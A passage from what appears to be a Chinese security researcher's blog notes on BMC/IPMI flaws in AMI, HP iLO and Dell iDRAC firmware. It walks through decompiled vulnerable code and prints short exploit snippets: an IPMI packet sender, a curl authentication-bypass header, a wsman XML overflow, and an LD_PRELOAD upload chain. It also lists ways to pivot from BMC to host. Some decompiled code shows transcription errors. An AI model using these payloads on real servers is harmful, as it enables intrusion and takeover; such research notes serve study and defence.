class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">" echo 'dlmod libsnmp_CHANGEME_mib /usr/local/lib/libsnmp_CHANGEME_mib.so' &gt;&gt;%s"</span>， <span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2023-34334-AMI-amp-CVE-2022-42290-NVIDIA"><a href="#CVE-2023-34334-AMI-amp-CVE-2022-42290-NVIDIA" class="headerlink" title="CVE-2023-34334 - AMI &amp; CVE-2022-42290 - NVIDIA"></a>CVE-2023-34334 - AMI &amp; CVE-2022-42290 - NVIDIA</h3><p>NTP Injection </p>
<p><img src="img%5Cimage-20231108183645122.png" alt="image-20231108183645122"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">subcmd = *req;</span><br><span class="line"><span class="keyword">switch</span> (*req)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>:												<span class="comment">// subcmd 1: set primary server</span></span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>:									 			<span class="comment">// subcmd 2: set secondary server</span></span><br><span class="line">        <span class="keyword">if</span>(req_len != <span class="number">129</span>)</span><br><span class="line">            <span class="keyword">goto</span> LABEL_7;</span><br><span class="line">        <span class="keyword">if</span> (g_BMCInfo[instance].ntp_enabled == <span class="number">1</span> )		<span class="comment">// ntp_enabled</span></span><br><span class="line">        &#123;</span><br><span class="line">            first_servername_byte = req[<span class="number">1</span>];</span><br><span class="line">            <span class="keyword">if</span> ( first_servername_byte )</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(subcmd == <span class="number">1</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">if</span> ( <span class="built_in">snprintf</span>(g_BMCInfo[instance].ntp_primary, <span class="number">0x80</span>u, <span class="string">"%s"</span>，req + <span class="number">1</span>) &lt;= <span class="number">0x7F</span> )				<span class="comment">// [1] 设置主服务器地址</span></span><br><span class="line">                        <span class="keyword">goto</span> success;</span><br><span class="line">                    IDBG_LINUXAPP_Dbg0ut(<span class="number">130</span>，<span class="string">"[%s :%d]Buffer 0verflow"</span>, <span class="string">"NTPCmds.c"</span>, <span class="number">222</span>);</span><br><span class="line">                    *res = <span class="number">0xF1</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> ( <span class="built_in">snprintf</span>(g_BMCInfo[ instance].ntp_secondary, <span class="number">0x80</span>u, <span class="string">"%s"</span>, req + <span class="number">1</span>) &lt;= <span class="number">0x7F</span> )</span><br><span class="line">                ...</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">case</span> <span class="number">4</span>:												<span class="comment">// subcmd 4: save config and restart ntp</span></span><br><span class="line">        <span class="keyword">if</span>(req_len!=<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">goto</span> LABEL <span class="number">7</span>;</span><br><span class="line">        <span class="keyword">if</span> ( g_ BMCInfo[instance].ntp_enabled == <span class="number">1</span> )	<span class="comment">// ntp_enabled</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> ( g_BMCInfo[instance].ntp_primary[<span class="number">0</span>] &amp;&amp; libami_setntpServer(<span class="number">1</span>, g_BMCInfo[instance].ntp_primary))	<span class="comment">// [2]</span></span><br><span class="line">            &#123;</span><br><span class="line">                v18 = dlerror();</span><br><span class="line">                IDBG_LINUXAPP_Dbg0ut(</span><br><span class="line">                    <span class="number">130</span>,</span><br><span class="line">                    ”[%s :%d]Error in loading symbol libami_ setntpServer %s\n<span class="string">" ,</span></span><br><span class="line"><span class="string">                    "</span>NTPCmds.C<span class="string">",</span></span><br><span class="line"><span class="string">                    296，</span></span><br><span class="line"><span class="string">                    v18);</span></span><br><span class="line"><span class="string">                    *res = -14;</span></span><br><span class="line"><span class="string">                return 1;</span></span><br><span class="line"><span class="string">            &#125;    </span></span><br><span class="line"><span class="string">            if ( l1bami_setntpServer(2, g_BMCInfo[instance].ntp_secondary))</span></span><br><span class="line"><span class="string">            ...</span></span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">libntpconf = dlopen(<span class="string">"/usr/local/lib/libntpconf.so"</span>, <span class="number">2</span>);</span><br><span class="line"><span class="keyword">if</span>( libntpconf) &#123;</span><br><span class="line">    libami_getntpServer = dlsym(libntpconf, <span class="string">"libami_getntpServer"</span>);</span><br><span class="line">    <span class="keyword">if</span> ( <span class="number">1</span>ibami_getntpServer &amp;&amp; libami_getntpServer(Primary, Secondary, <span class="number">128</span>)) 		<span class="comment">// [3]</span></span><br><span class="line">    &#123;</span><br><span class="line">        IDBG_LINUXAPP_DbgOut(<span class="number">130</span>, <span class="string">"[%s:%d]\n Error in getting primary and secondary ntp server\n"</span>, <span class="string">"PendTask.c"</span>, <span class="number">4073</span>);</span><br><span class="line">        <span class="keyword">goto</span> LABEL_7;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( <span class="built_in">snprintf</span>(ntpdate_cmd, <span class="number">0x100</span>u, <span class="string">"ntpdate -b -s -u %s"</span>, Primary) == <span class="number">-1</span>) 		<span class="comment">// [4]</span></span><br><span class="line">    &#123;</span><br><span class="line">    	IDBG_LINUXAPP_DbgOut(<span class="number">130</span>, <span class="string">"[%s:%d]\n PrimServer Data is invalid.\n"</span>, <span class="string">"PendTask.c"</span>, <span class="number">4078</span>); </span><br><span class="line">   	&#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        rc = safe_system(ntpdate_cmd); 												<span class="comment">// [5]</span></span><br><span class="line">        <span class="keyword">if</span>( !rc )</span><br><span class="line">        	<span class="keyword">goto</span> LABEL_6;</span><br><span class="line">        IDBG_LINUXAPP_DbgOut( </span><br><span class="line">        	<span class="number">130</span>,</span><br><span class="line">        	<span class="string">"[%s:%d]\n NTP update failure in primary server: :%d\n"</span>, </span><br><span class="line">        	<span class="string">"PendTask.c"</span>,</span><br><span class="line">        	&amp;elf_hash_bucket[<span class="number">958</span>], </span><br><span class="line">        	rc);</span><br><span class="line">		...</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">strcpy</span>(pipe_name, <span class="string">"/var/execdaemon_rep"</span>);</span><br><span class="line"><span class="built_in">memset</span>(&amp;pipe_name[<span class="number">20</span>], <span class="number">0</span>, θxEBu); </span><br><span class="line">status = <span class="number">0</span>;</span><br><span class="line"><span class="built_in">memset</span>(&amp;local_req, <span class="number">0</span>, <span class="keyword">sizeof</span>(local_req));</span><br><span class="line">local_req.pipe_id = LOBYTE(req-&gt;pipe_id) | (BYTE1(req-&gt;pipe_id) &lt;&lt; <span class="number">8</span>) | (BYTE2(req-&gt;pipe_id) &lt;&lt; <span class="number">16</span>) | (HIBYTE(req-&gt;pipe_id) &lt;&lt; <span class="number">24</span>);</span><br><span class="line"><span class="built_in">memcpy</span>(local_req.cmd, req-&gt;cmd, <span class="keyword">sizeof</span>(local_req.cmd));</span><br><span class="line">sem_post(&amp;sem);</span><br><span class="line">DBG_LINUXAPP_Runtime_DbgOut(<span class="number">135</span>, <span class="string">"[%s:%d]Command to execute is %s\n"</span>, <span class="string">"execdaemon.c"</span>, <span class="number">102</span>, local_req.cmd); </span><br><span class="line">status = system(local_req.cmd);													<span class="comment">// [6]</span></span><br><span class="line">IDBG_LINUXAPP_Runtime_DbgOut(<span class="number">135</span>, <span class="string">"[%s:%d]exedaemon ret: %d\n"</span>, <span class="string">"execdaemon.c"</span>, <span class="number">106</span>, status); </span><br><span class="line"><span class="keyword">if</span>(local_req.pipe_id &amp;&amp; <span class="built_in">snprintf</span>(pipe_name, <span class="number">0xFF</span>u, <span class="string">"%s.%d"</span>, <span class="string">"/var/execdaemon_rep, local_req.pipe_id) &gt;= 0)</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">	pipe = sigwrap_open_mode(pipe_name, 2, 0);</span></span><br><span class="line"><span class="string">	if(pipe = -1)</span></span><br><span class="line"><span class="string">    &#123;</span></span><br><span class="line"><span class="string">        IDBG_LINUXAPP_DbgOut(130,"</span>[%s:%d]Error opening named pipe %s\n<span class="string">", "</span>execdaemon.c<span class="string">", 123, pipe_name); </span></span><br><span class="line"><span class="string">        pthread_exit(0);</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">    length = sigwrap_write(pipe, &amp;status, 4);</span></span><br></pre></td></tr></table></figure>

<h3 id="CVE-2017-8979"><a href="#CVE-2017-8979" class="headerlink" title="CVE-2017-8979"></a>CVE-2017-8979</h3><p>IPMI Zero Length Pool Overflow - HP iLO2 &lt; 2.32 </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">length = IPMI_Packet-&gt;Message_Length – <span class="number">6</span>;</span><br><span class="line">mem = pool_block_allocate()</span><br><span class="line"><span class="built_in">memcpy</span>(mem, source, length);</span><br></pre></td></tr></table></figure>

<p>exploit</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">buf = <span class="string">"0600ff07000000000000000000092018c88100388e0465"</span></span><br><span class="line">mess= [int(buf[a:a+<span class="number">2</span>], <span class="number">16</span>) <span class="keyword">for</span> a <span class="keyword">in</span> range(<span class="number">0</span>,len(buf), <span class="number">2</span>)]</span><br><span class="line">p = <span class="number">13</span></span><br><span class="line">nm = mess[:p] + [<span class="number">0</span>] + mess[p+<span class="number">1</span>:]</span><br><span class="line">s = SendPacket(nm, sys.argv[<span class="number">1</span>], IPMI_PORT)</span><br></pre></td></tr></table></figure>

<h2 id="HTTPS"><a href="#HTTPS" class="headerlink" title="HTTPS"></a>HTTPS</h2><ul>
<li>默认开启</li>
<li>大部分使用流行的嵌入式web服务</li>
<li>Redfish<ul>
<li>Redfish是DTMF在IPMI惨败后创建的RESTful API</li>
<li>JSON通信</li>
<li>/redfish/v1/  可通过不同的接口获取服务器信息</li>
</ul>
</li>
<li>RIBCL<ul>
<li>HP iLO解决方案，用于通过HTTP使用XML进行配置和管理</li>
<li>/RIBCL 在认证前可访问</li>
<li>通过XML协议处理身份验证</li>
</ul>
</li>
<li>WS-MAN（Web Service Management）<ul>
<li>微软本地支持（Win-RM）</li>
<li>类似于XML语法，但有某些变化（基于SOAP）</li>
<li>由于Powershell支持而广泛使用</li>
<li>/wsman</li>
<li>认证：Basic Auth/ Digest-Auth/ Kerberos</li>
</ul>
</li>
</ul>
<h3 id="CVE-2017-12542"><a href="#CVE-2017-12542" class="headerlink" title="CVE-2017-12542"></a>CVE-2017-12542</h3><p>Overflow - HP ILO 4 &lt;2.53</p>
<p>这是一个由sscanf导致的溢出，ilo获取用户http请求头中的Connection，并拷贝到http_header中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( *global_struct_a2 )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( custom_strncasecmp((<span class="keyword">int</span>)https_connection, http_header, <span class="string">"Authorization:"</span>, <span class="number">14</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( custom_strncasecmp((<span class="keyword">int</span>)https_connection, http_header, <span class="string">"Content-length:"</span>, <span class="number">15</span>) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( custom_strncasecmp((<span class="keyword">int</span>)https_connection, http_header, <span class="string">"Cookie:"</span>, <span class="number">7</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ( !custom_strncasecmp((<span class="keyword">int</span>)https_connection, http_header, <span class="string">"Connection:"</span>, <span class="number">11</span>) )</span><br><span class="line">          <span class="built_in">sscanf</span>(http_header, <span class="string">"%*s %s"</span>, https_connection-&gt;connection);					<span class="comment">// 1</span></span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        cookie_header = (<span class="keyword">int</span> *)get_cookie_header((<span class="keyword">int</span>)global_struct_a2);</span><br><span class="line">        parse_req_cookie((<span class="keyword">int</span>)https_connection, (<span class="keyword">int</span>)http_header, cookie_header);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>http_header是一个结构体，定义了一些字段，在connection下0x1c偏移后就是检查是否本地登录的flag <code>localconnection</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">https_connection</span> &#123;</span></span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0C</span>: <span class="keyword">char</span> connection[<span class="number">0x10</span>];</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x28</span>: <span class="keyword">char</span> localConnection;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0xB8</span>: <span class="keyword">void</span> *vtable;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>exploit</p>
<p>覆盖localConnection：认证绕过</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -H <span class="string">"Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</span> [TARGET]</span><br></pre></td></tr></table></figure>

<p>覆盖虚表指针：任意代码执行</p>
<h3 id="CVE-2018-1207"><a href="#CVE-2018-1207" class="headerlink" title="CVE-2018-1207"></a>CVE-2018-1207</h3><p>Environment Variable Injection leads to RCE - iDRAC 8</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ cur1 &apos;https://x.x.x.x/cgi-bin/login?LD_DEBUG=files&apos;</span><br><span class="line">HTTP/1.1 503 Service Unavailable</span><br><span class="line">Keep-Alive: timeout=60, max=199</span><br><span class="line">[...]</span><br><span class="line">24986: file=/usr/lib/libfipsint.so.0.0.0 [0] ;		needed by /usr/1ocal/cgi-bin/ login [O]</span><br><span class="line">24986: file=/usr/lib/libfipsint.so.0.0.0 [0] ;		generating link map</span><br><span class="line">24986: dynamic : 0x295689e8		base: 0x29558000		size: 0x00010b24</span><br><span class="line">24986: entry: 0x29558680 	phdr: 0x29558034 		phnum : 4</span><br></pre></td></tr></table></figure>

<p><code>/cgi-bin/discover?LD_PRELOAD=xxx</code> 允许设置环境变量<br>常见思路： 将LD_PRELOAD指向标准输入文件<code>/proc/self/fd/0</code>  ，因为在CGI中POST Body就是标准输入，所以可以把后门放在Body中发送，完成利用。但不可用（这个问题其实和GoAhead有一个环境变量注入比较像，也许是因为他不允许将环境变量设置为一个非常文件，也许是因为<strong>在执行到CGI这里的时候，被打开的临时文件描述符其实已经被关闭了</strong>，p牛的解决方法就是控制content-length和文件大小让上传流程一直不结束，然后不关闭文件描述符。）</p>
<p>不过 <code>/cgi-bin/putfile</code> CGI允许未授权用户在文件<code>/tmp/sshpkauthupload.tmp</code>中存储任意内容，限128KB</p>
<p>exploit</p>
<ol>
<li>POST /cgi-bin/putfile                        上传任意文件内容</li>
<li>POST /cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp        作为环境变量注入</li>
</ol>
<h3 id="CVE-2017-8979-1"><a href="#CVE-2017-8979-1" class="headerlink" title="CVE-2017-8979"></a>CVE-2017-8979</h3><p>Preauth Stack-Based Buffer Overflow in <strong>Wsman</strong> XML Tag Name Parsing / <strong>Wsman</strong> XMLns - HP iLO2<br>同样是由于sscanf 将xml中<strong>:</strong>后的字符串拷贝到栈上导致的栈溢出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ROM:001108B4 movhi 		0x1F，rO， r7</span><br><span class="line">ROM:001108B8 movea		0xAEO, r7, r7</span><br><span class="line">			// &quot;%[^:]:%s&quot;</span><br><span class="line">ROM:001108BC addi 		0x8O, sp, r8</span><br><span class="line">ROM:001108C0 addi 		0xCO, sp, r9</span><br><span class="line">ROM:001108C4 jarl 		sscanf, lp</span><br><span class="line">			// sscanf(arg2，&quot;%[^:]:%s&quot;, sp[0x80], sp[OxCO])</span><br><span class="line">ROM:001108C8 CMP		2, r10</span><br><span class="line">ROM:001108CA bz			loc_1108E</span><br></pre></td></tr></table></figure>

<p>exploit</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">headers = &#123;<span class="string">'Content-Type'</span> : <span class="string">' application/soap+xml;charset=UTF-8'</span>&#125;</span><br><span class="line">payload = <span class="string">"&lt;x:"</span> + <span class="string">"B"</span>*<span class="number">0x300</span> + <span class="string">"&gt;\n&lt;/x&gt;"</span></span><br><span class="line">r= requests.post(<span class="string">'https://x.x.x.x/wsman'</span>, data=payload, verify=<span class="literal">False</span>, headers=headers)</span><br><span class="line"><span class="keyword">print</span> r.text</span><br></pre></td></tr></table></figure>

<h1 id="BMC-2-HOST"><a href="#BMC-2-HOST" class="headerlink" title="BMC 2 HOST"></a>BMC 2 HOST</h1><p>获得对BMC的管理访问权限后，可以使用多种方法来获得对主机操作系统的访问权限。</p>
<ol>
<li><p><strong>滥用BMC的KVM功能</strong>（VNC，自定义协议等），并重启主机至root shell（GRUB 中 init=/bin/sh）（也许不起作用，可能有security boot、signed command）或 指定救援盘作为虚拟 CD-ROM 并引导到该磁盘，获得对主机磁盘的原始访问权限，最大的缺点是必须重新启动主机才能使用此方法。</p>
<p> <img src="img%5Cimage-20231108170420750.png" alt="image-20231108170420750"></p>
</li>
<li><p>如果主机的物理控制台保持登录状态，那么使用内置 KVM 功能劫持它就很简单</p>
</li>
<li><p>如果串行端口连接到经过身份验证的会话，则 BMC 可能允许使用 LAN 上串行 (sol) 的 ipmitool 接口劫持此端口。</p>
</li>
<li><p>挂载远程DVD</p>
</li>
<li><p><strong>DMA</strong>（Direct Memory Access）直接内存访问，进行内存采集和操作</p>
</li>
<li><p>滥用对共享硬件的访问，例如 i2c 总线和超级 I/O 芯片。（还需要更多研究</p>
</li>
<li><p><strong>对主机FLASH更新</strong></p>
</li>
</ol>
<h1 id="HOST-2-BMC"><a href="#HOST-2-BMC" class="headerlink" title="HOST 2 BMC"></a>HOST 2 BMC</h1><p>这种应用场景较少。</p>
<ol>
<li>在一些BMC中，OS Tools是无需认证的</li>
<li>为BMC创建用户，如ipmitool将新用户注入BMC</li>
<li>部分厂商主机会有设备文件（如HP iLO）或数据库，与BMC通信。通过读写这些设备文件，可以对BMC进行管理、获取账号密码等。</li>
<li>启用模拟网络，通过漏洞破坏</li>
<li>刷固件</li>
<li>（BMC固件更新，也许主机上有未删除的原始固件，可转储固件进一步分析）</li>
</ol>
<blockquote>
<p>  ref：</p>
<p>  <a href="https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf" target="_blank" rel="noopener">https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf</a></p>
<p>  <a href="https://airbus-seclab.github.io/ilo/RECONBRX2018-Slides-Subverting_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf" target="_blank" rel="noopener">https://airbus-seclab.github.io/ilo/RECONBRX2018-Slides-Subverting_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf</a></p>
<p>  <a href="https://airbus-seclab.github.io/ilo/INSOMNIHACK2019-Slides-Riding_the_lightning_iLO4_5_BMC_security_wrapup-perigaud-gazet-czarny.pdf" target="_blank" rel="noopener">https://airbus-seclab.github.io/ilo/INSOMNIHACK2019-Slides-Riding_the_lightning_iLO4_5_BMC_security_wrapup-perigaud-gazet-czarny.pdf</a></p>
<p>  <a href="https://airbus-seclab.github.io/ilo/SSTIC2018-Slides-EN-Backdooring_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf" target="_blank" rel="noopener">https://airbus-seclab.github.io/ilo/SSTIC2018-Slides-EN-Backdooring_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf</a></p>
<p>  <a href="https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/" target="_blank" rel="noopener">IPMI 和 BMC 渗透测试人员指南</a></p>
<p>  <a href="http://fish2.com/ipmi/bp.pdf" target="_blank" rel="noopener">http://fish2.com/ipmi/bp.pdf</a></p>
<p>  <a href="http://fish2.com/ipmi/remote-pw-cracking.html" target="_blank" rel="noopener">http://fish2.com/ipmi/remote-pw-cracking.html</a></p>
<p>  <a href="https://delikely.eu.org/2021/06/22/BMC-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/" target="_blank" rel="noopener">BMC 历史漏洞汇总</a> 但感觉这些历史漏洞不是特别有参考价值，老/利用条件，bmc也就看成正常设备去挖，bmc2host更难点吧</p>
<p>  <a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf" target="_blank" rel="noopener">https://i.blackhat.com/us-18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf</a>  p26开始的实例代码比较有价值</p>
<p>  <a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Michael-Shkatov-Remotely-Attacking-System-Firmware.pdf" target="_blank" rel="noopener">https://i.blackhat.com/us-18/Wed-August-8/us-18-Michael-Shkatov-Remotely-Attacking-System-Firmware.pdf</a>   </p>
<p>  <a href="https://www.youtube.com/watch?v=dbJQIQibZQY" target="_blank" rel="noopener">https://www.youtube.com/watch?v=dbJQIQibZQY</a> </p>
<p>  <a href="https://media.defcon.org/DEF%20CON%2031/DEF%20CON%2031%20presentations/Alex%20Tereshkin%20Adam%20Zabrocki%20-%20Breaking%20BMC%20The%20Forgotten%20Key%20to%20the%20Kingdom.pdf" target="_blank" rel="noopener">https://media.defcon.org/DEF%20CON%2031/DEF%20CON%2031%20presentations/Alex%20Tereshkin%20Adam%20Zabrocki%20-%20Breaking%20BMC%20The%20Forgotten%20Key%20to%20the%20Kingdom.pdf</a></p>
<p>  <a href="https://dl.dell.com/manuals/all-products/esuprt_electronics/esuprt_software/esuprt_remote_ent_sys_mgmt/dell-openmanage-baseboard-mgmt-cntrllr-v4.6_user&#39;s%20guide_zh-cn.pdf" target="_blank" rel="noopener">https://dl.dell.com/manuals/all-products/esuprt_electronics/esuprt_software/esuprt_remote_ent_sys_mgmt/dell-openmanage-baseboard-mgmt-cntrllr-v4.6_user&#39;s%20guide_zh-cn.pdf</a></p>
</blockquote>
  
	  </div>
		  <footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/笔记/">笔记</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/BMC/">BMC</a>
  </div>

</div>



</footer>

   	       
	  </article>
	  
<nav class="article-nav clearfix">
 

<div class="next">
<a href="/2021/11/30/iot/multiple_auth_bypass_vuln_analysis/"  title="多个认证绕过漏洞分析">
 <span>多个认证绕过漏洞分析
</span>
</a>
</div>

</nav>

	  

</div> 
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">
<div id="authorInfo">
	
		<div class="author-img"></div>		
	
	<div class="social-info" class="clearfix">
		
		<a href="http://weibo.com/https://weibo.com/u/5213203661?refer_flag=0000015010_&amp;from=feed&amp;loc=nickname" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/p1Kk" target="_blank" class="icon-github" title="github"></a>
		
		
		
		
		
		
		
		
		
		
		<a href="mailto:p1kk_wang@qq.com" target="_blank" class="icon-email" title="Email Me"></a>
		

	</div>
</div>

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ACM/" title="ACM">ACM<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/CTF/" title="CTF">CTF<sup>4</sup></a></li>
		  
		
		  
			<li><a href="/categories/oj/" title="oj">oj<sup>20</sup></a></li>
		  
		
		  
			<li><a href="/categories/漏洞复现/" title="漏洞复现">漏洞复现<sup>10</sup></a></li>
		  
		
		  
			<li><a href="/categories/笔记/" title="笔记">笔记<sup>24</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/pwn/" title="pwn">pwn<sup>38</sup></a></li>
			
		
			
				<li><a href="/tags/wp/" title="wp">wp<sup>24</sup></a></li>
			
		
			
				<li><a href="/tags/tw/" title="tw">tw<sup>16</sup></a></li>
			
		
			
				<li><a href="/tags/iot/" title="iot">iot<sup>15</sup></a></li>
			
		
			
				<li><a href="/tags/笔记/" title="笔记">笔记<sup>11</sup></a></li>
			
		
			
				<li><a href="/tags/路由器/" title="路由器">路由器<sup>9</sup></a></li>
			
		
			
				<li><a href="/tags/栈溢出/" title="栈溢出">栈溢出<sup>8</sup></a></li>
			
		
			
				<li><a href="/tags/堆/" title="堆">堆<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/cve/" title="cve">cve<sup>4</sup></a></li>
			
		
			
				<li><a href="/tags/环境搭建/" title="环境搭建">环境搭建<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/栈/" title="栈">栈<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/攻防世界/" title="攻防世界">攻防世界<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/摄像头/" title="摄像头">摄像头<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/ubuntu18/" title="ubuntu18">ubuntu18<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/AWD/" title="AWD">AWD<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/命令执行/" title="命令执行">命令执行<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/命令注入/" title="命令注入">命令注入<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/认证绕过/" title="认证绕过">认证绕过<sup>1</sup></a></li>
			
		
			
